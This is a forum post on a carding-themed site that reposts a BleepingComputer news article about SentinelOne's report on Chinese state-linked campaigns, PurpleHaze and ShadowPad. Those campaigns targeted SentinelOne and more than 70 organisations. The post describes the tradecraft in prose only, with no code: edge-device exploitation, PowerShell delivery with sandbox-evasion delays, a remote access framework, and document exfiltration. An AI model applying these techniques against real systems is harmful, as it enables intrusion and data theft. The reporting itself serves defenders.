Carder.life

Carder.life (http://txgate.io:443/index.php)
-   Carding News (http://txgate.io:443/forumdisplay.php?f=38)
-   -   SentinelOne shares new details on China-linked breach attempt (http://txgate.io:443/showthread.php?t=51301192)

Artifact 06-10-2025 09:35 AM
<div id="post_message_796554">

SentinelOne has shared more details on an attempted supply chain attack by Chinese hackers through an IT services and logistics firm that manages hardware logistics for the cybersecurity firm.<br/>
<br/>
SentinelOne is an American endpoint protection (EDR/XDR) solutions provider that protects critical infrastructure in the country and numerous large enterprises.<br/>
<br/>
It is a high-value target for state actors as compromising could serve as a springboard to accessing downstream corporate networks and gaining insight into detection capabilities to develop evasion methods.<br/>
<br/>
SentinelLabs <a href="https://www.sentinelone.com/labs/top-tier-target-what-it-takes-to-defend-a-cybersecurity-company-from-todays-adversaries/" target="_blank">first reported </a>on the attempted attack in April, with a new report today describing the attack as part of a broader campaign targeting over 70 entities worldwide between June 2024 and March 2025.<br/>
<br/>
<img alt="" border="0" class="bbCodeImage" src="https://www.bleepstatic.com/images/news/u/1220909/2025/June/victims.jpg"/><br/>
<div style="margin:20px; margin-top:5px; ">
<!-- <div class="smallfont" style="margin-bottom:2px">Quote:</div> -->
<table border="0" cellpadding="6" cellspacing="0" width="100%">
<tr>
<td class="alt2" style="background: rgb(37, 37, 37) none repeat scroll 0% 0%; border: 1px solid rgb(0, 0, 0); border-radius: 5px; font-size: 11px; text-shadow: none;">

Targets of the campaign

</td>
</tr>
</table>
</div>The targets include organizations in government, telecommunications, media, finance, manufacturing, research, and IT sectors.<br/>
<br/>
The campaign is separated into two clusters. The first is 'PurpleHaze,' attributed to APT15 and UNC5174, covering a timeframe between September and October 2024.<br/>
<br/>
SentinelOne was targeted by both clusters, once for reconnaissance and once for supply chain intrusion.<br/>
<br/>
<img alt="" border="0" class="bbCodeImage" src="https://www.bleepstatic.com/images/news/u/1220909/2025/June/purple-hz.jpg"/><br/>
<div style="margin:20px; margin-top:5px; ">
<!-- <div class="smallfont" style="margin-bottom:2px">Quote:</div> -->
<table border="0" cellpadding="6" cellspacing="0" width="100%">
<tr>
<td class="alt2" style="background: rgb(37, 37, 37) none repeat scroll 0% 0%; border: 1px solid rgb(0, 0, 0); border-radius: 5px; font-size: 11px; text-shadow: none;">

PurpleHaze (left) and ShadowPad (right) attacks on SentinelOne

</td>
</tr>
</table>
</div>SentinelOne suspects that the threat actors in both campaigns exploited vulnerabilities in exposed network devices, including Ivanti Cloud Service Appliances and Check Point gateways.<br/>
<br/>
"We suspect that the most common initial access vector involved the exploitation of Check Point gateway devices, consistent with <a href="https://www.orangecyberdefense.com/global/blog/cert-news/meet-nailaolocker-a-ransomware-distributed-in-europe-by-shadowpad-and-plugx-backdoors" target="_blank">previous research</a> on this topic," <a href="https://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/" target="_blank">reports SentinelLabs</a>.<br/>
<br/>
"We also observed communication to ShadowPad C2 servers originating from Fortinet Fortigate, Microsoft IIS, SonicWall, and CrushFTP servers, suggesting potential exploitation of these systems as well."<br/>
<br/>
<b><font size="4"><font color="White">PurpleHaze and ShadowPad campaigns</font></font></b><br/>
<br/>
The PurpleHaze attack wave attempted to breach SentinelOne in October 2024, where threat actors conducted scans on the company's internet-exposed servers over port 443, looking to map accessible services.<br/>
<br/>
The threat actors registered domains masquerading as SentinelOne infrastructure, such as sentinelxdr[.]us and secmailbox[.]us.<br/>
<br/>
Based on evidence from other targets, including a South Asian government, successful attacks used the GOREshell backdoor, which was dropped on network-exposed endpoints using zero-day exploits.<br/>
<br/>
The more recent activity cluster is 'ShadowPad,' conducted by APT41 between June 2024 and March 2025.<br/>
<br/>
The threat actors attempted what is believed to be a supply chain attack on SentinelOne in early 2025, where APT41 used the ShadowPad malware, obfuscated via ScatterBrain, against an IT services and logistics company working with the cybersecurity company.<br/>
<br/>
The attackers delivered the malware to the target via PowerShell, which used a 60-second delay to evade sandbox environments. The malware then scheduled a system reboot after 30 minutes to clear traces in memory.<br/>
<br/>
Next, the hackers deployed the open-source remote access framework 'Nimbo-C2' to provide a wide range of <a href="https://github.com/itaymigdal/Nimbo-C2?tab=readme-ov-file#features" target="_blank">remote capabilities</a>, including screenshot capturing, PowerShell command execution, file operations, UAC bypass, and more.<br/>
<br/>
The attackers also used a PowerShell-based exfiltration script that performs a recursive search for sensitive user documents, archives them in a password-locked 7-Zip archive, and exfiltrates them.<br/>
<br/>
<img alt="" border="0" class="bbCodeImage" src="https://www.bleepstatic.com/images/news/u/1220909/2025/June/pos-exfil.jpg"/><br/>
<div style="margin:20px; margin-top:5px; ">
<!-- <div class="smallfont" style="margin-bottom:2px">Quote:</div> -->
<table border="0" cellpadding="6" cellspacing="0" width="100%">
<tr>
<td class="alt2" style="background: rgb(37, 37, 37) none repeat scroll 0% 0%; border: 1px solid rgb(0, 0, 0); border-radius: 5px; font-size: 11px; text-shadow: none;">

PowerShell data exfiltration script

</td>
</tr>
</table>
</div>SentinelOne comments that the threat actors' goals remain unclear, but a supply chain compromise is the most likely scenario.<br/>
<br/>
The cybersecurity company thoroughly examined its assets and reported that no compromise had been detected on SentinelOne software or hardware.<br/>
<br/>
"This post highlights the persistent threat posed by China-nexus cyberespionage actors to a wide range of industries and public sector organizations, including cybersecurity vendors themselves," concludes SentinelOne.<br/>
<br/>
"The activities detailed in this research reflect the strong interest these actors have in the very organizations tasked with defending digital infrastructure."<br/>
<br/>
<a href="https://www.bleepingcomputer.com/news/security/sentinelone-shares-new-details-on-china-linked-breach-attempt/" target="_blank">@ BleepingComputer </a>
</div>


All times are GMT. The time now is 03:12 AM.

Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2025, vBulletin Solutions, Inc.